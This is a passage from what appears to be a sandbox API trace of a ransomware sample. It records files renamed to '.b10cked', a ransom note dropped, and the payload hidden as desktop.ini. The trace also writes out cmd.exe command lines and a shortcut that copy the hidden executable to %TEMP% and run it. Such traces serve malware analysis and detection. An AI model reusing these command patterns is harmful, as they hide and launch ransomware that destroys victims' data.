cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0206.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x131324c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0206.715] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x2fa [0206.715] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0206.715] CloseHandle (hObject=0x120) returned 1 [0206.716] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm") returned 0x2d [0206.716] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\") returned 0x24 [0206.726] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xf28, dwThreadId=0x670)) returned 1 [0206.728] CloseHandle (hObject=0x1b4) returned 1 [0206.728] CloseHandle (hObject=0x120) returned 1 [0206.728] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{F325F05B-F963-4640-A43B-C8A494CDDA0F}\\") returned 0x48 [0206.728] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\\") returned 0x48 [0206.728] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{F325F05B-F963-4640-A43B-C8A494CDDA0F}\\", cchCount1=72, lpString2="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\\", cchCount2=72) returned 3 [0206.728] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{F325F05B-F963-4640-A43B-C8A494CDDA0F}\\") returned 0x48 [0206.728] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0206.728] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{F325F05B-F963-4640-A43B-C8A494CDDA0F}\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0206.728] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0206.728] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0206.728] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0206.728] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\") returned 0x24 [0206.729] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0206.729] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0206.729] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x924, dwThreadId=0x69c)) returned 1 [0206.730] CloseHandle (hObject=0x1b4) returned 1 [0206.730] CloseHandle (hObject=0x120) returned 1 [0206.730] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\bl0cked-readme.rtf")) returned 0xffffffff [0206.730] GetLastError () returned 0x2 [0206.731] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0206.735] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\bl0cked-readme.rtf")) returned 0x20 [0206.735] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0206.736] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0206.736] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0206.736] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0206.736] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0206.736] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0206.736] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0206.736] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\") returned 0x24 [0206.737] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0206.737] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0206.737] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1") returned 0x23 [0206.737] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x14a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{F325F~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{F325F~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{F325F~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{F325F~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x14a [0206.738] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0206.738] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x86c, dwThreadId=0x4f4)) returned 1 [0206.755] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0208.055] CloseHandle (hObject=0x120) returned 1 [0208.055] CloseHandle (hObject=0x1b4) returned 1 [0208.055] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0208.055] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0208.055] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0208.097] GetTickCount () returned 0x3a830 [0208.097] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=26488610879) returned 1 [0208.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x67\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0208.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x43\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0208.097] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x46\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0208.118] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x77\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0208.118] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x73\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0208.118] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x58\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0208.118] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x68\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0208.118] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x59\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0208.118] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0208.118] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0208.118] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0208.118] CharUpperBuffW (in: lpsz="explorer.exe \"{f325f05b-f963-4640-a43b-c8a494cdda0f}\" & type \"{f325f05b-f963-4640-a43b-c8a494cdda0f}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9d | out: lpsz="EXPLORER.EXE \"{F325F05B-F963-4640-A43B-C8A494CDDA0F}\" & TYPE \"{F325F05B-F963-4640-A43B-C8A494CDDA0F}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9d [0208.118] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0208.118] CharUpperBuffW (in: lpsz="explorer.exe \"{f325f05b-f963-4640-a43b-c8a494cdda0f}\" & type \"{f325f05b-f963-4640-a43b-c8a494cdda0f}\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9e | out: lpsz="EXPLORER.EXE \"{F325F05B-F963-4640-A43B-C8A494CDDA0F}\" & TYPE \"{F325F05B-F963-4640-A43B-C8A494CDDA0F}\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9e [0208.118] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0208.118] CoInitialize (pvReserved=0x0) returned 0x0 [0208.119] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0208.120] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0208.120] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0208.120] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0208.189] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"{f325f05b-f963-4640-a43b-c8a494cdda0f}\" & type \"{f325f05b-f963-4640-a43b-c8a494cdda0f}\\desktop.ini\" > \"%TEMP%\\gCFwsXhY.exe\" && \"%TEMP%\\gCFwsXhY.exe\"") returned 0x0 [0208.189] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0208.189] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0208.189] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0208.189] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}.lnk", fRemember=0) returned 0x0 [0208.196] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0208.196] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0208.196] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0208.196] CoUninitialize () [0208.196] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0208.196] ReleaseMutex (hMutex=0xf8) returned 1 [0208.196] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0208.197] ReleaseMutex (hMutex=0xf8) returned 1 [0208.197] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0208.197] ReleaseMutex (hMutex=0xf8) returned 1 [0208.197] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0208.197] ReleaseMutex (hMutex=0xf8) returned 1 [0208.197] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.326] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=26511539626) returned 1 [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.326] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x10b1e [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, 